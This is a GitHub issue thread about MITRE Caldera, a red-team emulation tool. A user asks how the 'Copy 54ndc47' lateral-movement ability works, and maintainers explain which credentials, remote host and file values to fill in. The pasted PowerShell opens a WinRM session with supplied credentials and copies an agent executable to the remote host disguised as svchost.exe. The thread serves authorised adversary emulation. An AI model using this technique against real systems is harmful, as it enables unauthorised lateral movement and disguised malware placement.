### ISSUE TITLE
Copying technique Sandcat 

### ISSUE THREAD

**Issue by veslo94** [mitre/caldera#2385]
Hello, I decided to download the latest version of caldera, I liked your new design, cool!

1)I have a question, explain how the Copy 54ndc47 (WinRM and SCP) technique works. Lateral movement tactics.

2) What arguments should I lead in the command for the place "#{domain.user.name}", "#{domain.user.password}", "#{remote.host.name}", "#{remote.host.name}", "#{location}", "#{exe_name}" please tell me with an example. 

P.S. Having an agent already on the remote host. There are several remote hosts in my virtual environment and all on the same subnet. 

`$job = Start-Job -ScriptBlock {
  $username = "#{domain.user.name}";
  $password = "#{domain.user.password}";
  $secstr = New-Object -TypeName System.Security.SecureString;
  $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
  $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
  $session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred;
  $location = "#{location}";
  $exe = "#{exe_name}";
  Copy-Item $location -Destination "C:\Users\Public\svchost.exe" -ToSession $session;
  Start-Sleep -s 5;
  Remove-PSSession -Session $session;
};
Receive-Job -Job $job -Wait;`

**Comment by cyber-arsenull** [comment]
Thank you, I love the new design as well! I appreciate you jumping into the Alpha. 

I don't have an immediate answer for you, but I will try to test this out tomorrow or Friday and respond if someone else doesn't beat me to it.

**Comment by cyber-arsenull** [comment]
Sorry for this taking so long, I've had trouble getting my testing environment up. 

First, just wanted to note that these are "facts" and I'd recommend reading about them in the documentation first. You'll need to add these values for them in the fact source you use for an operation. 

I believe you should be able to put something like this:
`#{domain.user.name}` =  user name on remote host, e.g., `Administrator`
`#{domain.user.password}` = the password for that user on the remote host.
`"#{remote.host.name}"` = The name of the remote computer, it is possible that just its IP address should work. Otherwise it would be the host's name on the domain. 
`"#{location}"` = The location on the remote host that you want to put the file at. e.g., `C:/Users/Public/`
`"#{exe_name}"` = What to name the file being put at the above location, e.g., `sandcat.exe`

I'll get back to you with a more concrete example once I test. Let me know if the above clears it up though!

Happy Holidays!

**Comment by cmagone** [comment]
@veslo94 Were you able to add these facts to a fact source and try the ability?
